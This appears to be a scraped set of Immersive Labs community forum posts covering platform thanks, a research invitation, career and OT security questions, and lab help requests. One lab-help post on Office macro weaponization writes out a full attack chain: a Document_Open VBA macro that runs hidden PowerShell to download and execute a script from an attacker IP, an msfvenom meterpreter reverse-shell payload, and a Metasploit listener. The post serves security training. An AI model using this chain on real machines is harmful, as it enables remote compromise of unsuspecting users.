Thank you, Immersive Labs
For your kindness and genius. And for allowing us to be a little bit wiser every day; thank you for your practical and theoretical labs (I have even smiled with some of them :)). Thank you for making us investigate, for going a little further; and for having an impact on our customers: protecting them better. Thank you for allowing us to work with recent CVEs from various perspectives (attack, defense and post-mortem). Thank you for your effort and for making it possible. Here's to many more years! :).Take part in Immersive research: AI Chatbot in labs
π’ We would love to hear your opinions on a new AI Chatbot concept within our labs. Can you spare an hour to come along to a research call? During the call, you will be asked to undertake a lab on our test environment, using the AI chatbot to assist. We will then ask for feedback on your experience. You will need to attend the call on a laptop or desktop (no tablets or phones) and be able to share your screen throughout. The session will be recorded and will take place using Google Meet. Upon completion of the session, you will receive a Β£50 eGift card (or local currency equivalent). Sessions are taking place August 12-14th. ποΈ Sign up at a time that is convenient for you, using this booking form..Halloween Labs - ideas, suggestions, wants π»ππ¦
What would you want to see from future Halloween labs? Did you really enjoy a particular aspect of previous years? Any technologies, themes, rewards you want to see? Want more Community content - webinars, events, media within the labs? π»ππ¦
Wondering about potential jobs offered after completion of labs....
Hi - I was wondering about the jobs available after completing the labs. I've been a support engineer for five years now, most recently a senior engineer at a Silicon Valley MSP. I've already earned a one-year college Cybersecurity Networking certification from a community college (with a 3.9 GPA) and the Security+. Can someone give me an idea of potential companies? Also are any of the positions remote? I live in the northern California mountains....Incident Response: P2 - stuck on Q11
I successfully completed the previous question, but Iβm currently encountering difficulties with Question 11: βWhat are the last 6 characters of the MD5 checksum of the malware executable?β Iβve identified and extracted the malware executable and the associated IOCs; however, none of the MD5 hashes Iβve generated appear to match the expected result. Upon reviewing the instructions, I revisited the step: βUsing a Python script or a manual deobfuscation method, get the binary from the VBA script.β I suspect this is where my process may be breaking down β specifically in extracting the correct binary from the VBA script. Could one of the instructors kindly provide guidance or clarification on where I might be going wrong?
Operational Technology a Concern?
"Hey Immersive Labs community, I'm curious about your experiences with Operational Technology (OT) in your organizations. With the increasing convergence of IT and OT across healthcare, education, and various industries, I'm seeing more medical devices, building automation systems, and industrial control systems becoming part of our daily operations. A few questions for the community: How are you currently handling OT security challenges in your environment? What knowledge gaps do you see in your teams when it comes to securing OT systems? For those in healthcare or campus environments - what specific OT challenges keep you up at night? What skills do you wish your teams had to better manage OT security? I believe this is becoming increasingly important as more connected devices and control systems enter our networks. Would love to hear your thoughts and experiences - both challenges and successes. Looking forward to learning from everyone's perspectives!"
Weaponization: Payloads β Office Macros
I've been banging my head against this brick wall for a few hours now and I could use a second set of eyes. 1. I've created a macro enabled word doc with the following vb code on windows machine: Sub Document_Open() Dim ps as String ps = "powershell.exe -NoExit Invoke-Expression (New-Object Net.WebClient).DownloadString('http://MY_KALI_IP/shell.ps1')" process = Shell(ps, vbhide) End Sub 2. python3 -m http.server to start server to serve shell.ps1 on request 3. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f psh > shell.ps1 to create reverse shell with same name the command in the macro script will go looking for 4. create listener with sudo msfconsole, use exploit/multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST KALI IP, set LPORT 443 then exploit to start listener 5. back on windows machine, go to target_ip:8888, browse to macro doc, submit and execute. What am I missing?
FIN7 Threat Hunting with Splunk: Ep.2 β Initial Access
Question 8: Extract the hex-encoded image from the RTF that starts on line 108. Decode and open the resulting image file. What is the first line of text that appears in the image? I facing difficulties answering this question, Please let me know how can I answer this?
